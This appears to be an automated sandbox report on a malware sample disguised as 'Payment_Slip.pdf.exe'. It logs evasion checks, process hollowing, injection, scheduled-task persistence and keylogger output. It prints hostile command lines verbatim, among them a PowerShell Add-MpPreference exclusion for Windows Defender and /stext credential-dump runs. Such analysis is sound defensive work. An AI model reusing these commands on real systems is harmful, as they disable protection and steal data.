Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598453
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598343
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598234
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598124
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598012
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 597906
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 597796
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 597397
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 597281
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 597171
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 597062
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596952
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596843
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596734
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596624
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596515
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596406
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596296
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596187
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596077
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 595968
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 595859
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 595749
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 595640
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 595531
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 595421
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 595312
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 595202
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 595041
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 594935
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 594820
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 594718
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 1200000
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 1199890
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 1199781
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 1199672
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 1199530
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599765
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599656
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599547
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599437
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599328
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599219
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599109
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599000
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598890
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598781
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598662
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598531
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598422
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598250
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598124
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598015
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 597906
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 597797
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 597687
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 597578
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 597468
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 597358
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 597250
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 597140
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 597029
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596921
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596812
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596703
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596593
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596484
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596375
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596265
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596156
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596046
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 595937
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 595827
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 595714
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 595588
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 595359
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 595250
Source: Payment_Slip.pdf.exe, 00000005.00000002.3611370738.0000000001330000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0{?
Source: Payment_Slip.pdf.exe, 00000000.00000002.1191644087.0000000008250000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: E6m03XlgugbphGFSZxI
Source: Payment_Slip.pdf.exe, 00000005.00000002.3614283187.00000000013E0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.2826846976.000001F041652000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: svchost.exe, 0000000A.00000002.2826136324.000001F03C02B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP`eA
Source: conserver.exe, 0000000D.00000002.3642218318.000000000672C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll_
Source: Windows Update.exe, 0000001A.00000002.3641937968.0000000006060000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllb
Source: Payment_Slip.pdf.exe, 00000000.00000002.1185558701.0000000000745000.00000004.00000020.00020000.00000000.sdmp, mHTmhPhJy.exe, 00000007.00000002.1239687916.00000000014F2000.00000004.00000020.00020000.00000000.sdmp, host.exe, 0000000C.00000002.3611941996.0000000000903000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1543370328.000000000633D000.00000004.00000020.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3611272951.0000000000752000.00000004.00000020.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3654737637.0000000006330000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Code function: 13_2_0682B960 LdrInitializeThunk, 13_2_0682B960
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_004327AE
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 14_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 14_2_0040DD85
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 11_2_0041A8DA
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_004407B5 mov eax, dword ptr fs:[00000030h] 11_2_004407B5
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_004407B5 mov eax, dword ptr fs:[00000030h] 17_2_004407B5
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_00410763 SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError, 11_2_00410763
Enables debug privileges
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Roaming\host.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_004327AE
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_004328FC SetUnhandledExceptionFilter, 11_2_004328FC
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_004398AC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_004398AC
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_00432D5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_00432D5C
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 17_2_004327AE
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_004328FC SetUnhandledExceptionFilter, 17_2_004328FC
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_004398AC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 17_2_004398AC
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_00432D5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 17_2_00432D5C
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mHTmhPhJy.exe"
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mHTmhPhJy.exe" Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Memory written: C:\Users\user\Desktop\Payment_Slip.pdf.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Memory written: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe base: 400000 value starts with: 4D5A Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: NULL target: C:\Users\user\Desktop\Payment_Slip.pdf.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: NULL target: C:\Users\user\Desktop\Payment_Slip.pdf.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section loaded: NULL target: C:\Windows\SysWOW64\schtasks.exe protection: execute and read and write Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Section unmapped: C:\Windows\SysWOW64\schtasks.exe base address: 400000 Jump to behavior
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 11_2_00410B5C
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 17_2_00410B5C
Contains functionality to simulate mouse events
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_004175E1 mouse_event, 11_2_004175E1
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mHTmhPhJy.exe" Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mHTmhPhJy" /XML "C:\Users\user\AppData\Local\Temp\tmp2819.tmp" Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process created: C:\Users\user\Desktop\Payment_Slip.pdf.exe "C:\Users\user\Desktop\Payment_Slip.pdf.exe" Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process created: C:\Users\user\AppData\Roaming\host.exe "C:\Users\user\AppData\Roaming\host.exe" Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process created: C:\Users\user\AppData\Local\Temp\conserver.exe "C:\Users\user\AppData\Local\Temp\conserver.exe" Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process created: C:\Users\user\Desktop\Payment_Slip.pdf.exe C:\Users\user\Desktop\Payment_Slip.pdf.exe /stext "C:\Users\user\AppData\Local\Temp\qticobshgwcqiiv" Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process created: C:\Users\user\Desktop\Payment_Slip.pdf.exe C:\Users\user\Desktop\Payment_Slip.pdf.exe /stext "C:\Users\user\AppData\Local\Temp\snnvpudbueuusojfxn" Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process created: C:\Users\user\Desktop\Payment_Slip.pdf.exe C:\Users\user\Desktop\Payment_Slip.pdf.exe /stext "C:\Users\user\AppData\Local\Temp\dpanqmncqmmhvvfjoxmrs" Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process created: C:\Users\user\AppData\Local\Temp\dwn.exe "C:\Users\user\AppData\Local\Temp\dwn.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mHTmhPhJy" /XML "C:\Users\user\AppData\Local\Temp\tmp36FE.tmp" Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Process created: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe "C:\Users\user\AppData\Roaming\mHTmhPhJy.exe" Jump to behavior
Source: Payment_Slip.pdf.exe, 00000005.00000002.3613632265.00000000013D3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerFD\
Source: conserver.exe, 0000000D.00000002.3619471195.000000000320E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:24:11)</font></font><br><font color="#00ba66">{Win}</font>rTH
Source: mykksg.exe, 00000019.00000002.3621446588.0000000002693000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: Program Manager]</b> (15/03/2025 22:44:04)<br>{Win}r@\
Source: host.exe, 0000000C.00000002.3622366959.0000000002767000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: Program Manager]</b> (15/03/2025 18:55:28)<br>{Win}r{Win}r{Win}<br><b>[ ]</b> (16/03/2025 17:48:16)<br>rTH
Source: conserver.exe, 0000000D.00000002.3619471195.0000000003233000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 13:00:39)</font></font><br><font color="#00ba66">{Win}</font>rTH
Source: conserver.exe, 0000000D.00000002.3619471195.000000000320E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:24:11)</font></font><br><font color="#00ba66">{Win}</font>r<font color="#00ba66">{Win}</font><br>t-
Source: Payment_Slip.pdf.exe, 00000005.00000002.3613632265.00000000013D3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerr|
Source: conserver.exe, 0000000D.00000002.3619471195.0000000003233000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 13:00:39)</font></font><br><font color="#00ba66">{Win}</font>r<font color="#00ba66">{Win}</font>TH
Source: host.exe, 0000000C.00000002.3622366959.0000000002767000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: Program Manager]</b> (15/03/2025 18:55:28)<br>{Win}r{Win}TH
Source: host.exe, 0000000C.00000002.3622366959.0000000002767000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: Program Manager]</b> (15/03/2025 18:55:28)<br>{Win}TH
Source: host.exe, 0000000C.00000002.3622366959.0000000002767000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: Program Manager]</b> (15/03/2025 18:55:28)<br>{Win}rTH
Source: host.exe, 0000000C.00000002.3622366959.0000000002789000.00000004.00000800.00020000.00000000.sdmp, host.exe, 0000000C.00000002.3622366959.00000000027BE000.00000004.00000800.00020000.00000000.sdmp, host.exe, 0000000C.00000002.3622366959.0000000002795000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: Program Manager]</b> (15/03/2025 18:55:28)<br>{Win}r{Win}r{Win}<br><b>[ ]</b> (16/03/2025 17:48:16)<br>r<br><b>[ Microsoft
Source: host.exe, 0000000C.00000002.3622366959.00000000027BE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: Program Manager]</b> (17/03/2025 04:21:47)<
Source: host.exe, 0000000C.00000002.3622366959.0000000002767000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: Program Manager]</b> (15/03/2025 18:55:28)<br>{Win}r{Win}r{Win}TH
Source: conserver.exe, 0000000D.00000002.3619471195.0000000003242000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 13:00:39)</font></font><br><font color="#00ba66">{Win}</font>r<font color="#00ba66">{Win}</font>r
Source: host.exe, 0000000C.00000002.3622366959.0000000002789000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: Program Manager]</b> (17/03/2025 04:21:47)<br>@\
Source: conserver.exe, 0000000D.00000002.3619471195.000000000320E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:24:11)</font></font><br><font color="#00ba66">{Win}</font>r<font color="#00ba66">{Win}</font>TH
Source: host.exe, 0000000C.00000002.3622366959.0000000002751000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.00000000031FC000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.00000000033AB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Managert-
Source: Windows Update.exe, 00000018.00000002.1539307669.0000000003442000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:34:45)</font></font><br><font color="#00ba66">{Win}</font>r<font color="#00ba66">{Win}</font>TH
Source: conserver.exe, 0000000D.00000002.3619471195.000000000320E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:24:11)</font></font><br><font color="#00ba66">{Win}</font>r<font color="#00ba66">{Win}</font><br><font color="#00b1ba"><b>[ </b> <b>]</b> <font color="#000000">(03/15/2025 12:46:52)</font></font><br>LR
Source: mykksg.exe, 00000019.00000002.3621446588.0000000002689000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: Program Manager]</b> (15/03/2025 22:44:04)<br>@\
Source: conserver.exe, 0000000D.00000002.3619471195.0000000003233000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 13:00:39)</font></font><br>
Source: Windows Update.exe, 00000018.00000002.1539307669.0000000003442000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:34:45)</font></font><br>
Source: host.exe, 0000000C.00000002.3622366959.0000000002789000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: Program Manager]</b> (17/03/2025 04:21:47)<br>{Win}rTH
Source: conserver.exe, 0000000D.00000002.3619471195.000000000320E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:24:11)</font></font><br><font color="#00ba66">{Win}</font>r<font color="#00ba66">{Win}</font><br><font color="#00b1ba"><b>[ </b> <b>]</b> <font color="#000000">(03/15/2025 12:46:52)</font></font><br>rTH
Source: mykksg.exe, 00000019.00000002.3621446588.0000000002689000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: Program Manager]</b> (15/03/2025 22:44:04)<br>{Win}TH
Source: host.exe, 0000000C.00000002.3622366959.0000000002767000.00000004.00000800.00020000.00000000.sdmp, host.exe, 0000000C.00000002.3622366959.0000000002789000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003233000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR
Source: Payment_Slip.pdf.exe, 00000005.00000002.3613632265.00000000013D3000.00000004.00000020.00020000.00000000.sdmp, Payment_Slip.pdf.exe, 00000005.00000002.3613632265.00000000013C6000.00000004.00000020.00020000.00000000.sdmp, Payment_Slip.pdf.exe, 00000005.00000002.3611370738.0000000001330000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: host.exe, 0000000C.00000002.3622366959.0000000002767000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: Program Manager]</b> (15/03/2025 18:55:28)<br>@\
Source: Windows Update.exe, 00000018.00000002.1539307669.0000000003442000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:34:45)</font></font><br><font color="#00ba66">{Win}</font>r<font color="#00ba66">{Win}</font><br><font color="#00b1ba"><b>[ </b> <b>]</b> <font color="#000000">(03/15/2025 12:54:37)</font></font><br>LR
Source: host.exe, 0000000C.00000002.3622366959.0000000002767000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: Program Manager]</b> (15/03/2025 18:55:28)<br>{Win}r{Win}r{Win}<br><b>[ ]</b> (16/03/2025 17:48:16)<br>r<br>t-
Source: host.exe, 0000000C.00000002.3622366959.00000000027BE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: Program Manager]</b> (17/03/2025 04:21:47)<LR
Source: Windows Update.exe, 00000018.00000002.1539307669.0000000003442000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:34:45)</font></font><br><font color="#00ba66">{Win}</font>rTH
Source: host.exe, 0000000C.00000002.3622366959.0000000002767000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: Program Manager]</b> (15/03/2025 18:55:28)<br>{Win}r{Win}rTH
Source: conserver.exe, 0000000D.00000002.3619471195.0000000003242000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003233000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 12:24:11)</font></font><br><font color="#00ba66">{Win}</font>r<font color="#00ba66">{Win}</font><br><font color="#00b1ba"><b>[ </b> <b>]</b> <font color="#000000">(03/15/2025 12:46:52)</font></font><br>r<br><font color="#00b1ba"><b>[ Microsoft
Source: host.exe, 0000000C.00000002.3622366959.0000000002795000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: Program Manager]</b> (17/03/2025 04:21:47)<br>{Win}r
Source: conserver.exe, 0000000D.00000002.3619471195.0000000003233000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 13:00:39)</font></font><br><font color="#00ba66">{Win}</font>TH
Source: mykksg.exe, 00000019.00000002.3621446588.0000000002689000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: Program Manager]</b> (15/03/2025 22:44:04)<br>{Win}rTH
Source: conserver.exe, 0000000D.00000002.3619471195.0000000003233000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: </b>Program Manager <b>]</b> <font color="#000000">(03/15/2025 13:00:39)</font></font><br><font color="#00ba66">{Win}</font>r<font color="#00ba66">{Win}</font>rTH
Source: Payment_Slip.pdf.exe, 00000005.00000002.3611370738.0000000001330000.00000004.00000020.00020000.00000000.sdmp, logs.dat.5.dr Binary or memory string: [Program Manager]
Source: mykksg.exe, 00000019.00000002.3621446588.0000000002693000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Operating System: Program Manager]</b> (15/03/2025 22:44:04)<br>{Win}r
Source: Payment_Slip.pdf.exe, 00000005.00000002.3613632265.00000000013D3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerQz(
